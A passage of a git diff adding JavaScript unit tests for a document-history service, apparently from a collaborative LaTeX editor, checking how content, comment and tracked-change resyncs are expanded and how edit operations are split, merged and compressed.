+ const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([]) + expect(this.extendLock).to.have.been.called + }) + + it('queues text updates for docs whose contents is out of sync', async function () { + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [this.persistedFile] + ), + docContentSyncUpdate( + this.persistedDoc, + 'the fox jumps over the lazy dog' + ), + ] + this.UpdateCompressor.diffAsShareJsOps.returns([ + { d: 'quick brown ', p: 4 }, + ]) + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + doc: this.persistedDoc.doc, + op: [{ d: 'quick brown ', p: 4 }], + meta: { + pathname: this.persistedDoc.path, + doc_length: this.persistedDocContent.length, + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('queues text updates for docs created by project structure sync', async function () { + this.UpdateCompressor.diffAsShareJsOps.returns([{ i: 'a', p: 0 }]) + const newDoc = { + path: 'another.tex', + doc: new ObjectId().toString(), + } + const newDocContent = 'a' + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc, newDoc], + [this.persistedFile] + ), + docContentSyncUpdate(newDoc, newDocContent), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + pathname: newDoc.path, + doc: newDoc.doc, + docLines: '', + meta: { + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + { + doc: newDoc.doc, + op: [{ i: 'a', p: 0 }], + meta: { + pathname: newDoc.path, + doc_length: 0, + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + it('skips text updates for docs when hashes match', async function () { + this.fileMap['main.tex'].getHash.returns('special-hash') + this.HashManager._getBlobHashFromString.returns('special-hash') + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [this.persistedFile] + ), + docContentSyncUpdate(this.persistedDoc, 'hello'), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([]) + expect(this.extendLock).to.have.been.called + }) + + it('computes text updates for docs when hashes differ', async function () { + this.fileMap['main.tex'].getHash.returns('first-hash') + this.HashManager._getBlobHashFromString.returns('second-hash') + this.UpdateCompressor.diffAsShareJsOps.returns([ + { i: 'test diff', p: 0 }, + ]) + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [this.persistedFile] + ), + docContentSyncUpdate(this.persistedDoc, 'hello'), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([ + { + doc: this.persistedDoc.doc, + op: [{ i: 'test diff', p: 0 }], + meta: { + pathname: this.persistedDoc.path, + doc_length: this.persistedDocContent.length, + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + + describe('for docs whose contents is out of sync', function () { + beforeEach(async function () { + const updates = [ + resyncProjectStructureUpdate( + [this.persistedDoc], + [this.persistedFile] + ), + docContentSyncUpdate(this.persistedDoc, 'the quick brown fox'), + ] + this.UpdateCompressor.diffAsShareJsOps.returns([ + { d: ' jumps over the lazy dog', p: 19 }, + ]) + this.expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + }) + + it('loads content from the history service when needed', function () { + expect(this.expandedUpdates).to.deep.equal([ + { + doc: this.persistedDoc.doc, + op: [{ d: ' jumps over the lazy dog', p: 19 }], + meta: { + pathname: this.persistedDoc.path, + doc_length: this.persistedDocContent.length, + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + expect(this.extendLock).to.have.been.called + }) + }) + }) + + describe('syncing comments', function () { + beforeEach(function () { + this.loadedSnapshotDoc + .getComments() + .add(new Comment('comment1', [new Range(4, 5)])) + this.loadedSnapshotDoc + .getComments() + .add(new Comment('comment2', [new Range(10, 5)], true)) + this.comments = [ + makeComment('comment1', 4, 'quick'), + makeComment('comment2', 10, 'brown'), + ] + this.resolvedCommentIds = ['comment2'] + }) + + it('does nothing if comments have not changed', async function () { + const updates = [ + docContentSyncUpdate( + this.persistedDoc, + this.persistedDocContent, + { + comments: this.comments, + }, + this.resolvedCommentIds + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.deep.equal([]) + }) + + it('adds missing comments', async function () { + this.comments.push(makeComment('comment3', 20, 'jumps')) + const updates = [ + docContentSyncUpdate( + this.persistedDoc, + this.persistedDocContent, + { + comments: this.comments, + }, + this.resolvedCommentIds + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.deep.equal([ + { + doc: this.persistedDoc.doc, + op: [ + { + c: 'jumps', + p: 20, + t: 'comment3', + resolved: false, + }, + ], + meta: { + origin: { + kind: 'history-resync', + }, + pathname: this.persistedDoc.path, + resync: true, + ts: TIMESTAMP, + doc_length: this.persistedDocContent.length, + }, + }, + ]) + }) + + it('deletes extra comments', async function () { + this.comments.splice(0, 1) + const updates = [ + docContentSyncUpdate( + this.persistedDoc, + this.persistedDocContent, + { + comments: this.comments, + }, + this.resolvedCommentIds + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.deep.equal([ + { + pathname: this.persistedDoc.path, + deleteComment: 'comment1', + meta: { + origin: { + kind: 'history-resync', + }, + resync: true, + ts: TIMESTAMP, + }, + }, + ]) + }) + + it('updates comments when ranges differ', async function () { + this.comments[1] = makeComment('comment2', 16, 'fox') + const updates = [ + docContentSyncUpdate( + this.persistedDoc, + this.persistedDocContent, + { + comments: this.comments, + }, + this.resolvedCommentIds + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.deep.equal([ + { + doc: 'doc-id', + op: [ + { + c: 'fox', + p: 16, + t: 'comment2', + resolved: true, + }, + ], + meta: { + origin: { + kind: 'history-resync', + }, + resync: true, + ts: TIMESTAMP, + pathname: this.persistedDoc.path, + doc_length: this.persistedDocContent.length, + }, + }, + ]) + }) + + it('sets the resolved state when it differs', async function () { + this.resolvedCommentIds = ['comment1'] + const updates = [ + docContentSyncUpdate( + this.persistedDoc, + this.persistedDocContent, + { + comments: this.comments, + }, + this.resolvedCommentIds + ), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.have.deep.members([ + { + pathname: this.persistedDoc.path, + commentId: 'comment1', + resolved: true, + meta: { + origin: { + kind: 'history-resync', + }, + resync: true, + ts: TIMESTAMP, + }, + }, + { + pathname: this.persistedDoc.path, + commentId: 'comment2', + resolved: false, + meta: { + origin: { + kind: 'history-resync', + }, + resync: true, + ts: TIMESTAMP, + }, + }, + ]) + }) + + it('treats zero length comments as detached comments', async function () { + this.loadedSnapshotDoc.getComments().add(new Comment('comment1', [])) + this.comments = [ + makeComment('comment1', 16, ''), + makeComment('comment2', 10, 'brown'), + ] + this.resolvedCommentIds = ['comment2'] + + const updates = [ + docContentSyncUpdate( + this.persistedDoc, + this.persistedDocContent, + { + comments: this.comments, + }, + this.resolvedCommentIds + ), + ] + + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + expect(expandedUpdates).to.deep.equal([]) + }) + + it('adjusts comment positions when the underlying text has changed', async function () { + const updates = [ + docContentSyncUpdate( + this.persistedDoc, + 'quick brown fox', + { + comments: [ + makeComment('comment1', 0, 'quick'), + makeComment('comment2', 12, 'fox'), + ], + }, + this.resolvedCommentIds + ), + ] + this.UpdateCompressor.diffAsShareJsOps.returns([ + { d: 'the ', p: 0 }, + { d: ' jumps over the lazy dog', p: 15 }, + ]) + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.deep.equal([ + { + doc: this.persistedDoc.doc, + op: [ + { d: 'the ', p: 0 }, + { d: ' jumps over the lazy dog', p: 15 }, + ], + meta: { + pathname: this.persistedDoc.path, + doc_length: this.persistedDocContent.length, + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + { + doc: this.persistedDoc.doc, + op: [ + { + c: 'fox', + p: 12, + t: 'comment2', + resolved: true, + }, + ], + meta: { + origin: { + kind: 'history-resync', + }, + pathname: this.persistedDoc.path, + resync: true, + ts: TIMESTAMP, + doc_length: 'quick brown fox'.length, + }, + }, + ]) + }) + }) + + describe('syncing tracked changes', function () { + beforeEach(function () { + this.loadedSnapshotDoc.getTrackedChanges().add( + new TrackedChange(new Range(4, 6), { + type: 'delete', + userId: USER_ID, + ts: new Date(TIMESTAMP), + }) + ) + this.loadedSnapshotDoc.getTrackedChanges().add( + new TrackedChange(new Range(10, 6), { + type: 'insert', + userId: USER_ID, + ts: new Date(TIMESTAMP), + }) + ) + this.loadedSnapshotDoc.getTrackedChanges().add( + new TrackedChange(new Range(20, 6), { + type: 'delete', + userId: USER_ID, + ts: new Date(TIMESTAMP), + }) + ) + this.loadedSnapshotDoc.getTrackedChanges().add( + new TrackedChange(new Range(40, 3), { + type: 'insert', + userId: USER_ID, + ts: new Date(TIMESTAMP), + }) + ) + this.changes = [ + makeTrackedChange('td1', { p: 4, d: 'quick ' }), + makeTrackedChange('ti1', { p: 4, hpos: 10, i: 'brown ' }), + makeTrackedChange('td2', { p: 14, hpos: 20, d: 'jumps ' }), + makeTrackedChange('ti2', { p: 28, hpos: 40, i: 'dog' }), + ] + }) + + it('does nothing if tracked changes have not changed', async function () { + const updates = [ + docContentSyncUpdate(this.persistedDoc, this.persistedDocContent, { + changes: this.changes, + }), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.deep.equal([]) + }) + + it('adds new tracked changes', async function () { + this.changes.splice( + 3, + 0, + makeTrackedChange('td3', { p: 29, hpos: 35, d: 'lazy ' }) + ) + const updates = [ + docContentSyncUpdate(this.persistedDoc, this.persistedDocContent, { + changes: this.changes, + }), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.deep.equal([ + { + doc: this.persistedDoc.doc, + op: [ + { + p: 35, + r: 'lazy ', + tracking: { + type: 'delete', + userId: USER_ID, + ts: TIMESTAMP, + }, + }, + ], + meta: { + origin: { + kind: 'history-resync', + }, + pathname: this.persistedDoc.path, + resync: true, + ts: TIMESTAMP, + doc_length: this.persistedDocContent.length, + }, + }, + ]) + }) + + it('removes extra tracked changes', async function () { + this.changes.splice(0, 1) + const updates = [ + docContentSyncUpdate(this.persistedDoc, this.persistedDocContent, { + changes: this.changes, + }), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.deep.equal([ + { + doc: this.persistedDoc.doc, + op: [ + { + p: 4, + r: 'quick ', + tracking: { type: 'none' }, + }, + ], + meta: { + origin: { + kind: 'history-resync', + }, + pathname: this.persistedDoc.path, + resync: true, + ts: TIMESTAMP, + doc_length: this.persistedDocContent.length, + }, + }, + ]) + }) + + it('handles overlapping ranges', async function () { + this.changes = [ + makeTrackedChange('ti1', { p: 0, i: 'the quic' }), + makeTrackedChange('td1', { p: 8, d: 'k br' }), + makeTrackedChange('ti2', { p: 14, hpos: 23, i: 'ps over' }), + ] + const updates = [ + docContentSyncUpdate(this.persistedDoc, this.persistedDocContent, { + changes: this.changes, + }), + ] + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + + // Before: the [quick ][brown ] fox [jumps ]over the lazy dog + // After: [the quic][k br]own fox jum[ps over] the lazy dog + expect(expandedUpdates).to.deep.equal([ + { + doc: this.persistedDoc.doc, + op: [ + { + p: 0, + r: 'the quic', + tracking: { type: 'insert', userId: USER_ID, ts: TIMESTAMP }, + }, + { + p: 10, + r: 'br', + tracking: { type: 'delete', userId: USER_ID, ts: TIMESTAMP }, + }, + { + p: 12, + r: 'own ', + tracking: { type: 'none' }, + }, + { + p: 20, + r: 'jum', + tracking: { type: 'none' }, + }, + { + p: 23, + r: 'ps over', + tracking: { type: 'insert', userId: USER_ID, ts: TIMESTAMP }, + }, + { + p: 40, + r: 'dog', + tracking: { type: 'none' }, + }, + ], + meta: { + origin: { kind: 'history-resync' }, + pathname: this.persistedDoc.path, + resync: true, + ts: TIMESTAMP, + doc_length: this.persistedDocContent.length, + }, + }, + ]) + }) + + it('adjusts tracked change positions when the underlying text has changed', async function () { + const updates = [ + docContentSyncUpdate( + this.persistedDoc, + 'every fox jumps over the lazy dog', + { + changes: [ + makeTrackedChange('ti1', { p: 5, i: ' ' }), // the space after every is still a tracked insert + makeTrackedChange('td2', { p: 10, d: 'jumps ' }), + makeTrackedChange('ti2', { p: 24, hpos: 30, i: 'dog' }), + ], + }, + this.resolvedCommentIds + ), + ] + this.UpdateCompressor.diffAsShareJsOps.returns([ + { d: 'the quick brown', p: 0 }, + { i: 'every', p: 0 }, + ]) + const expandedUpdates = + await this.SyncManager.promises.expandSyncUpdates( + this.projectId, + this.historyId, + this.mostRecentChunk, + updates, + this.extendLock + ) + expect(expandedUpdates).to.deep.equal([ + { + doc: this.persistedDoc.doc, + op: [ + { d: 'the quick brown', p: 0 }, + { i: 'every', p: 0 }, + ], + meta: { + pathname: this.persistedDoc.path, + doc_length: this.persistedDocContent.length, + resync: true, + ts: TIMESTAMP, + origin: { kind: 'history-resync' }, + }, + }, + ]) + }) + }) + }) +}) diff --git a/services/project-history/test/unit/js/UpdateCompressor/UpdateCompressorTests.js b/services/project-history/test/unit/js/UpdateCompressor/UpdateCompressorTests.js new file mode 100644 index 0000000..c8d50b1 --- /dev/null +++ b/services/project-history/test/unit/js/UpdateCompressor/UpdateCompressorTests.js @@ -0,0 +1,1591 @@ +import { expect } from 'chai' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/UpdateCompressor.js' + +const bigstring = 'a'.repeat(2 * 1024 * 1024) +const mediumstring = 'a'.repeat(1024 * 1024) + +describe('UpdateCompressor', function () { + beforeEach(async function () { + this.UpdateCompressor = await esmock(MODULE_PATH) + this.user_id = 'user-id-1' + this.other_user_id = 'user-id-2' + this.doc_id = 'mock-doc-id' + this.doc_hash = 'doc-hash' + this.ts1 = Date.now() + this.ts2 = Date.now() + 1000 + }) + + describe('convertToSingleOpUpdates', function () { + it('should split grouped updates into individual updates', function () { + expect( + this.UpdateCompressor.convertToSingleOpUpdates([ + { + op: [ + (this.op1 = { p: 0, i: 'Foo' }), + (this.op2 = { p: 6, i: 'bar' }), + ], + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: [(this.op3 = { p: 10, i: 'baz' })], + meta: { ts: this.ts2, user_id: this.other_user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: this.op1, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: this.op2, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: this.op3, + meta: { ts: this.ts2, user_id: this.other_user_id }, + v: 43, + }, + ]) + }) + + it('should return no-op updates when the op list is empty', function () { + expect( + this.UpdateCompressor.convertToSingleOpUpdates([ + { + op: [], + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + ]) + ).to.deep.equal([]) + }) + + it('should not ignore comment ops', function () { + expect( + this.UpdateCompressor.convertToSingleOpUpdates([ + { + op: [ + (this.op1 = { p: 0, i: 'Foo' }), + (this.op2 = { p: 9, c: 'baz' }), + (this.op3 = { p: 6, i: 'bar' }), + ], + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 10 }, + v: 42, + }, + ]) + ).to.deep.equal([ + { + op: this.op1, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 10 }, + v: 42, + }, + { + op: this.op2, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 13 }, + v: 42, + }, + { + op: this.op3, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 13 }, + v: 42, + }, + ]) + }) + + it('should not ignore retain ops with tracking data', function () { + expect( + this.UpdateCompressor.convertToSingleOpUpdates([ + { + op: [ + (this.op1 = { p: 0, i: 'Foo' }), + (this.op2 = { + p: 9, + r: 'baz', + tracking: { type: 'none' }, + }), + (this.op3 = { p: 6, i: 'bar' }), + ], + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 10 }, + v: 42, + }, + ]) + ).to.deep.equal([ + { + op: this.op1, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 10 }, + v: 42, + }, + { + op: this.op2, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 13 }, + v: 42, + }, + { + op: this.op3, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 13 }, + v: 42, + }, + ]) + }) + + it('should update doc_length when splitting after an insert', function () { + expect( + this.UpdateCompressor.convertToSingleOpUpdates([ + { + op: [ + (this.op1 = { p: 0, i: 'foo' }), + (this.op2 = { p: 6, d: 'bar' }), + ], + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 20 }, + v: 42, + }, + ]) + ).to.deep.equal([ + { + op: this.op1, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 20 }, + v: 42, + }, + { + op: this.op2, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 23 }, + v: 42, + }, + ]) + }) + + it('should update doc_length when splitting after a delete', function () { + expect( + this.UpdateCompressor.convertToSingleOpUpdates([ + { + op: [ + (this.op1 = { p: 0, d: 'foo' }), + (this.op2 = { p: 6, i: 'bar' }), + ], + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 20 }, + v: 42, + }, + ]) + ).to.deep.equal([ + { + op: this.op1, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 20 }, + v: 42, + }, + { + op: this.op2, + meta: { ts: this.ts1, user_id: this.user_id, doc_length: 17 }, + v: 42, + }, + ]) + }) + + it('should take tracked changes into account when calculating the doc length', function () { + const meta = { + ts: this.ts1, + user_id: this.user_id, + tc: 'tracked-change-id', + } + expect( + this.UpdateCompressor.convertToSingleOpUpdates([ + { + op: [ + { p: 6, i: 'orange' }, // doc_length += 6 + { p: 22, d: 'apple' }, // doc_length doesn't change + { p: 12, i: 'melon', u: true }, // doc_length += 5 + { p: 18, i: 'banana', u: true, trackedDeleteRejection: true }, // doc_length doesn't change + { + p: 8, + d: 'pineapple', + trackedChanges: [{ type: 'insert', offset: 0, length: 9 }], + }, // doc_length -= 9 + { p: 11, i: 'fruit salad' }, + ], + meta: { ...meta, doc_length: 20, history_doc_length: 30 }, + v: 42, + }, + ]) + ).to.deep.equal([ + { + op: { p: 6, i: 'orange' }, + meta: { ...meta, doc_length: 30 }, + v: 42, + }, + { + op: { p: 22, d: 'apple' }, + meta: { ...meta, doc_length: 36 }, + v: 42, + }, + { + op: { p: 12, i: 'melon', u: true }, + meta: { ...meta, doc_length: 36 }, + v: 42, + }, + { + op: { p: 18, i: 'banana', u: true, trackedDeleteRejection: true }, + meta: { ...meta, doc_length: 41 }, + v: 42, + }, + { + op: { + p: 8, + d: 'pineapple', + trackedChanges: [{ type: 'insert', offset: 0, length: 9 }], + }, + meta: { ...meta, doc_length: 41 }, + v: 42, + }, + { + op: { p: 11, i: 'fruit salad' }, + meta: { ...meta, doc_length: 32 }, + v: 42, + }, + ]) + }) + + it('should set the doc hash on the last split update only', function () { + const meta = { + ts: this.ts1, + user_id: this.user_id, + } + expect( + this.UpdateCompressor.convertToSingleOpUpdates([ + { + op: [ + { p: 0, i: 'foo' }, + { p: 6, i: 'bar' }, + ], + meta: { ...meta, doc_hash: 'hash1' }, + v: 42, + }, + { + op: [{ p: 10, i: 'baz' }], + meta: { ...meta, doc_hash: 'hash2' }, + v: 43, + }, + { + op: [ + { p: 0, d: 'foo' }, + { p: 20, i: 'quux' }, + { p: 3, d: 'bar' }, + ], + meta: { ...meta, doc_hash: 'hash3' }, + v: 44, + }, + ]) + ).to.deep.equal([ + { op: { p: 0, i: 'foo' }, meta, v: 42 }, + { op: { p: 6, i: 'bar' }, meta: { ...meta, doc_hash: 'hash1' }, v: 42 }, + { + op: { p: 10, i: 'baz' }, + meta: { ...meta, doc_hash: 'hash2' }, + v: 43, + }, + { op: { p: 0, d: 'foo' }, meta, v: 44 }, + { op: { p: 20, i: 'quux' }, meta, v: 44 }, + { op: { p: 3, d: 'bar' }, meta: { ...meta, doc_hash: 'hash3' }, v: 44 }, + ]) + }) + }) + + describe('concatUpdatesWithSameVersion', function () { + it('should concat updates with the same version, doc and pathname', function () { + expect( + this.UpdateCompressor.concatUpdatesWithSameVersion([ + { + doc: this.doc_id, + pathname: 'main.tex', + op: (this.op1 = { p: 0, i: 'Foo' }), + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: this.doc_id, + pathname: 'main.tex', + op: (this.op2 = { p: 6, i: 'bar' }), + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: this.doc_id, + pathname: 'main.tex', + op: (this.op3 = { p: 10, i: 'baz' }), + meta: { ts: this.ts2, user_id: this.other_user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + doc: this.doc_id, + pathname: 'main.tex', + op: [this.op1, this.op2], + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: this.doc_id, + pathname: 'main.tex', + op: [this.op3], + meta: { ts: this.ts2, user_id: this.other_user_id }, + v: 43, + }, + ]) + }) + + it('should not concat updates with different doc id', function () { + expect( + this.UpdateCompressor.concatUpdatesWithSameVersion([ + { + doc: this.doc_id, + pathname: 'main.tex', + op: (this.op1 = { p: 0, i: 'Foo' }), + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: 'other', + pathname: 'main.tex', + op: (this.op2 = { p: 6, i: 'bar' }), + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: this.doc_id, + pathname: 'main.tex', + op: (this.op3 = { p: 10, i: 'baz' }), + meta: { ts: this.ts2, user_id: this.other_user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + doc: this.doc_id, + pathname: 'main.tex', + op: [this.op1], + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: 'other', + pathname: 'main.tex', + op: [this.op2], + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + doc: this.doc_id, + pathname: 'main.tex', + op: [this.op3], + meta: { ts: this.ts2, user_id: this.other_user_id }, + v: 43, + }, + ]) + }) + + it('should not concat text updates with project structure ops', function () { + expect( + this.UpdateCompressor.concatUpdatesWithSameVersion([ + { + doc: this.doc_id, + pathname: 'main.tex', + op: (this.op1 = { p: 0, i: 'Foo' }), + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'main.tex', + new_pathname: 'new.tex', + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + ]) + ).to.deep.equal([ + { + doc: this.doc_id, + pathname: 'main.tex', + op: [this.op1], + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: 'main.tex', + new_pathname: 'new.tex', + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + ]) + }) + + it("should keep the doc hash only when it's on the last update", function () { + const meta = { ts: this.ts1, user_id: this.user_id } + const baseUpdate = { doc: this.doc_id, pathname: 'main.tex', meta } + const updates = [ + { ...baseUpdate, op: { p: 0, i: 'foo' }, v: 1 }, + { + ...baseUpdate, + op: { p: 10, i: 'bar' }, + meta: { ...meta, doc_hash: 'hash1' }, + v: 1, + }, + { + ...baseUpdate, + op: { p: 20, i: 'baz' }, + meta: { ...meta, doc_hash: 'hash2' }, + v: 2, + }, + { ...baseUpdate, op: { p: 30, i: 'quux' }, v: 2 }, + ] + expect( + this.UpdateCompressor.concatUpdatesWithSameVersion(updates) + ).to.deep.equal([ + { + ...baseUpdate, + op: [ + { p: 0, i: 'foo' }, + { p: 10, i: 'bar' }, + ], + meta: { ...meta, doc_hash: 'hash1' }, + v: 1, + }, + { + ...baseUpdate, + op: [ + { p: 20, i: 'baz' }, + { p: 30, i: 'quux' }, + ], + v: 2, + }, + ]) + }) + }) + + describe('compress', function () { + describe('insert - insert', function () { + it('should append one insert to the other', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foobar' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should insert one insert inside the other', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 5, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'fobaro' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not append separated inserts', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 9, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 9, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not append inserts that are too big (second op)', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: bigstring }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: bigstring }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not append inserts that are too big (first op)', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: bigstring }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 3 + bigstring.length, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: bigstring }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 3 + bigstring.length, i: 'bar' }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not append inserts that are too big (first and second op)', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: mediumstring }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 3 + mediumstring.length, i: mediumstring }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: mediumstring }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 3 + mediumstring.length, i: mediumstring }, + meta: { ts: this.ts2, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not append inserts that are a long time appart', function () { + this.ts3 = this.ts1 + 120000 // 2 minutes + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts3, user_id: this.user_id }, + v: 43, + }, + ]) + ).to.deep.equal([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + op: { p: 6, i: 'bar' }, + meta: { ts: this.ts3, user_id: this.user_id }, + v: 43, + }, + ]) + }) + + it('should not append inserts separated by project structure ops', function () { + expect( + this.UpdateCompressor.compressUpdates([ + { + op: { p: 3, i: 'foo' }, + meta: { ts: this.ts1, user_id: this.user_id }, + v: 42, + }, + { + pathname: '/old.tex', + new_pathname: '/new.tex', + meta: { ts: this.ts1, user_id: this.user_id }, + v: 43, + }, + { + op: { p: 6, i: 'bar' }, + 